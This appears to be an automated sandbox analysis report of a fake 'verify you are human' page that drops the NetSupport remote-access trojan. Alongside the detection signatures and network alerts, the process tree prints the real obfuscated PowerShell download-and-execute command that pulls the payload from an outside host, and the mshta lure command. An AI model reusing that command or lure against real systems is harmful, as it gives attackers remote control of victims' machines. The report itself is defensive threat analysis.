Edit tour
Windows
Analysis Report
https://tekascend.com/Ray-verify.html
Overview
General Information
| Sample URL: | https://tekascend.com/Ray-verify.html |
| Analysis ID: | 1579080 |
| Infos: |   |
 | |
Detection
NetSupport RAT
| Score: | 80 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
AI detected suspicious Javascript
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
svchost.exe (PID: 6928 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
chrome.exe (PID: 7032 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6408 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2168 --fi eld-trial- handle=198 0,i,119141 2043750487 662,614950 8338053022 804,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 4304 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://tekas cend.com/R ay-verify. html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
mshta.exe (PID: 364 cmdline: "C:\Window s\system32 \mshta.exe " https:// tekascend. com/Ray-ve rify.html # ? ''Ve rify you a re human - Ray Verif ication ID : 3855'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) 
powershell.exe (PID: 2912 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='##(N# #ew-O###bj e###ct N## #et.W###e' ; $c4='b## Cl####ie## nt##).###D ###ow#nl## o##'; $c3= 'a##dSt### #ri#####n# ##g(''http ://goaccre dited.biz/ o/o.png'') ';$TC=($c1 ,$c4,$c3 - Join '');$ TC=$TC.rep lace('#',' ');I`E`X $ TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 3292 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 2420 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - cmd.exe (PID: 2352 cmdline:
"C:\Window s\system32 \cmd.exe" /c attrib +h C:\User s\user\App Data\Roami ng\cwQzbS MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - attrib.exe (PID: 2408 cmdline:
attrib +h C:\Users\u ser\AppDat a\Roaming\ cwQzbS MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cleanup
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
System Summary |   |
|---|
| Source: | Author: Michael Haag: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: vburov: | ||
Remote Access Functionality | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-20T19:17:31.426953+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:31.751272+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:33.093099+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:34.667195+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:34.991196+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:35.442452+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:35.761557+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:36.150382+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:36.676468+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:43.706371+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:44.506108+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
| 2024-12-20T19:17:45.584871+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
Phishing | |
|---|
| Source: | Joe Sandbox AI: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
Networking | |
|---|
| Source: | Image file has PE prefix: | ||